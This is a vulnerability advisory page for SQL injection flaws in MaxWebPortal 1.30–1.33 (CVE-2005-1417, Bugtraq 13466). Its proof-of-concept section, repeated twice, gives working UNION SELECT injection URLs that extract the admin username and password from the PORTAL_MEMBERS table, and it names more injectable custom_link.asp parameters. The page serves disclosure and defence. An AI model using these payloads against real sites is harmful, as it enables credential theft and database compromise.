MaxWebPortal Multiple SQL Injection Vulnerabilities
BID:13466
Info
MaxWebPortal Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 13466 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-1417 |
| Remote: | Yes |
| Local: | No |
| Published: | May 02 2005 12:00AM |
| Updated: | Jul 12 2009 02:06PM |
| Credit: | Discovery of these vulnerabilities is credited to s-dalili" <[email protected]>. |
| Vulnerable: |
phpCOIN phpCOIN 1.2.1 b phpCOIN phpCOIN 1.2.1 phpCOIN phpCOIN 1.2 MaxWebPortal MaxWebPortal 1.33 MaxWebPortal MaxWebPortal 1.32 MaxWebPortal MaxWebPortal 1.31 MaxWebPortal MaxWebPortal 1.30 |
| Not Vulnerable: | |
Discussion
MaxWebPortal Multiple SQL Injection Vulnerabilities
MaxWebPortal is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
MaxWebPortal is reportedly affected by multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Exploit / POC
MaxWebPortal Multiple SQL Injection Vulnerabilities
No exploit is required. The following examples are available:
Get Username=Admin password: (if I didn't write some of them, you can make
them easily by yourself!)
----------------
Dl_Popular.asp?40 DL_ID,Hit,DESCRIPTION,NAME,POST_DATE,1,1,1,1,1,1,1 FROM DL
union select
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union
select
---------------
Links_Popular.asp?10
LINK_ID,Hit,DESCRIPTION,NAME,POST_DATE,banner_url,1,1,1,1,1,1,1 FROM LINKS
union select m_username,m_password,1,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS
where
m_username='admin' union select
--------------
pics_popular.asp?10 LINK_ID, HIT,NAME, URL, KEYWORD, DESCRIPTION, EMAIL,
POST_DATE,
BANNER_URL, CATEGORY, PARENT_ID, SHOW, BADLINK FROM pic union select
m_username,m_password,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union select
-------------
dl_toprated.asp?10 RATING,Votes,DESCRIPTION,NAME,POST_DATE,1,1,1,1,1,1,1
FROM DL union select
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union
select
some another Sql injections are:
custom_link.asp?method=Topic&TOPIC_ID=[Sql inject]
custom_link.asp?method=Forum&Forum_ID=[Sql inject]
No exploit is required. The following examples are available:
Get Username=Admin password: (if I didn't write some of them, you can make
them easily by yourself!)
----------------
Dl_Popular.asp?40 DL_ID,Hit,DESCRIPTION,NAME,POST_DATE,1,1,1,1,1,1,1 FROM DL
union select
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union
select
---------------
Links_Popular.asp?10
LINK_ID,Hit,DESCRIPTION,NAME,POST_DATE,banner_url,1,1,1,1,1,1,1 FROM LINKS
union select m_username,m_password,1,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS
where
m_username='admin' union select
--------------
pics_popular.asp?10 LINK_ID, HIT,NAME, URL, KEYWORD, DESCRIPTION, EMAIL,
POST_DATE,
BANNER_URL, CATEGORY, PARENT_ID, SHOW, BADLINK FROM pic union select
m_username,m_password,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union select
-------------
dl_toprated.asp?10 RATING,Votes,DESCRIPTION,NAME,POST_DATE,1,1,1,1,1,1,1
FROM DL union select
m_username,m_password,1,1,1,1,1,1,1,1,1,1 from PORTAL_MEMBERS where
m_username='admin' union
select
some another Sql injections are:
custom_link.asp?method=Topic&TOPIC_ID=[Sql inject]
custom_link.asp?method=Forum&Forum_ID=[Sql inject]
Solution / Fix
MaxWebPortal Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
MaxWebPortal Multiple SQL Injection Vulnerabilities
References:
References:
- MaxWebPortal Homepage (MaxWebPortal)
- phpCOIN Home Page (phpCOIN)
- Multiple Sql injections in phpCoin v1.2.2 and below (dcrab
)